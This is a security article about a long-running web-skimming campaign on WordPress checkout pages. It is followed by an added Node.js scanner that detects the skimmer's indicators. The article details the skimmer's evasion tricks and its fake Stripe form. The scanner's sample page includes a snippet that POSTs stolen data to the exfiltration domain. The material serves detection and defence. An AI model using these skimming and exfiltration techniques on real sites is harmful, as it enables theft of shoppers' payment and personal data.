
Exposing the Threat: Long-Running Web Skimming Campaign Targets Online Checkout Pages

Researchers at Silent Push have uncovered a long-running web skimming campaign, active since January 2022, that targets online checkout pages accepting cards from major payment networks including American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, and UnionPay. Silent Push notes that enterprises partnering with these payment providers are the organizations most likely to be affected.

Digital skimming, also known as Magecart, is the practice of compromising legitimate e-commerce sites and payment portals and injecting malicious JavaScript that silently harvests sensitive data, such as payment card details, as shoppers fill in the checkout form. The technique was first associated with Magento-based stores, but it has since spread to many other platforms, including, as this campaign shows, WordPress-based shops.

Silent Push traced the campaign's infrastructure to Stark Industries, a bulletproof hosting provider that has since been sanctioned and now operates as part of the rebranded entity THE.Hosting, a rebrand the researchers describe as a sanctions-evasion tactic. One domain in that infrastructure, cdn-cookie.com, was found hosting the obfuscated JavaScript payloads used for card skimming.

The skimmer uses several evasion techniques. One is to look for an element with the id "wpadminbar" in the page's Document Object Model (DOM); WordPress renders this toolbar only for logged-in users, so its presence means the page is being viewed by a site administrator or operator rather than a shopper. If the element is found, the skimmer runs a self-destruct routine that removes every trace of itself from the page. The check re-runs every time the DOM is modified, which happens constantly during normal interaction with a checkout page, so the skimmer can still bail out if the admin bar appears after the script first loads.

If the skimmer detects that Stripe is the payment method, it checks localStorage for a key named "wc_cart_hash", a name that blends in with the keys WooCommerce's own cart-fragments script stores. If the key is absent, the skimmer replaces the legitimate Stripe payment form with a counterfeit copy and lets the shopper type in their card number, expiration date, and CVC. Once the details are captured, the fake form displays an error, so the victim assumes they simply mistyped their card details.

Alongside the card data, the skimmer also captures the shopper's name, phone number, email address, and shipping address. The collected data is exfiltrated in an HTTP POST request to "lasorie.com". After the upload, the skimmer cleans up after itself: it reinstates the original Stripe form, so the shopper's retry goes through the genuine payment flow, and it sets the "wc_cart_hash" key so that the skimmer does not run a second time in the same browser and the victim never sees the fake form again.
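As an added example that is not part of the article or of Silent Push's research, the Node.js script below scans a page's `<script>` elements for the indicators described in the three paragraphs above: the two domains named by the researchers, the "wpadminbar" lookup, the MutationObserver-driven re-execution, the "wc_cart_hash" localStorage marker, and heavy use of hex string escapes as a cheap obfuscation signal. The sample page, the rule names, the kind/severity split, and the threshold of eight escapes are constructed for illustration and are not taken from the real payload.

```javascript
// Added example, not from the article or from Silent Push: a static scanner that
// flags scripts in a saved page for the indicators the article attributes to this
// skimmer. Domains and behaviours come from the article; the sample page, rule
// names and the hex-escape threshold are constructed for illustration.

const IOC_DOMAINS = ["cdn-cookie.com", "lasorie.com"]; // payload host and exfil endpoint (article)

// Undo the cheapest obfuscation layer (JS hex/unicode string escapes) so that
// "\x77\x70..." is matched as "wpadminbar". Anything heavier needs a real deobfuscator.
function normalize(text) {
  return text
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Each rule sees the raw and the normalized script text. "ioc" rules are hard
// indicators; "behaviour" rules are heuristics that need corroboration.
const RULES = [
  { id: "ioc-domain", kind: "ioc",
    test: (raw, norm) => new RegExp(IOC_DOMAINS.map(d => d.replace(/\./g, "\\.")).join("|"), "i").test(norm) },
  { id: "hex-escapes", kind: "behaviour",        // string obfuscation (threshold is an assumption)
    test: (raw) => (raw.match(/\\x[0-9a-fA-F]{2}/g) || []).length >= 8 },
  { id: "admin-bar-check", kind: "behaviour",    // looks for a logged-in WordPress user
    test: (raw, norm) => /wpadminbar/i.test(norm) },
  { id: "mutation-observer", kind: "behaviour",  // re-runs on every DOM change
    test: (raw, norm) => /new\s+MutationObserver\s*\(/.test(norm) },
  { id: "cart-hash-marker", kind: "behaviour",   // victim marker in localStorage
    test: (raw, norm) => /localStorage\s*\.\s*(getItem|setItem)\s*\(\s*['"]wc_cart_hash['"]/.test(norm) },
];

// Pull every <script> out of the HTML: its src attribute (if any) and inline body.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Returns the ids of the rules that fire for one script (src URL + inline body).
function scanScript(script) {
  const raw = (script.src || "") + "\n" + script.body;
  const norm = normalize(raw);
  return RULES.filter(r => r.test(raw, norm)).map(r => r.id);
}

// Any IOC hit is decisive; behavioural hits only count when two or more coincide.
function verdict(hits) {
  const kinds = hits.map(id => RULES.find(r => r.id === id).kind);
  if (kinds.includes("ioc")) return "known-skimmer";
  if (kinds.filter(k => k === "behaviour").length >= 2) return "suspicious";
  return "clean";
}

function scanHtml(html) {
  return extractScripts(html).map((s, index) => {
    const hits = scanScript(s);
    return { index, src: s.src, hits, verdict: verdict(hits) };
  });
}

// Constructed sample page: a normal first-party script followed by a stand-in for
// the injected loader. It mirrors the behaviour the article describes; it is not
// the real payload and does nothing when run in a browser here.
const SAMPLE_PAGE = `<html><body>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>
var k="\\x77\\x70\\x61\\x64\\x6d\\x69\\x6e\\x62\\x61\\x72";
new MutationObserver(function(){ if(document.getElementById(k)){ /* self-destruct */ } })
  .observe(document,{childList:true,subtree:true});
if(!localStorage.getItem('wc_cart_hash')){ /* swap in fake Stripe form */ }
fetch('https://lasorie.com/',{method:'POST',body:JSON.stringify(stolen)});
</script>
</body></html>`;

console.log(JSON.stringify(scanHtml(SAMPLE_PAGE), null, 2));
```

Only the domain match is a hard indicator; the behavioural rules are heuristics (WordPress's own toolbar script also references "wpadminbar", and MutationObserver is common in legitimate code), which is why verdict() needs at least two of them before reporting "suspicious". External scripts are matched only by their src URL here; fetch their bodies and pass them to scanScript() to inspect them. Real payloads hide behind more than hex escapes, so treat a "clean" result as "nothing obvious", not as proof of absence.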

Silent Push believes the attacker has a deep understanding of WordPress internals, weaving several lesser-known features of the platform into the skimmer. That level of craft points to increasingly sophisticated criminal operations targeting e-commerce platforms, and it calls for greater vigilance from merchants and shoppers alike.
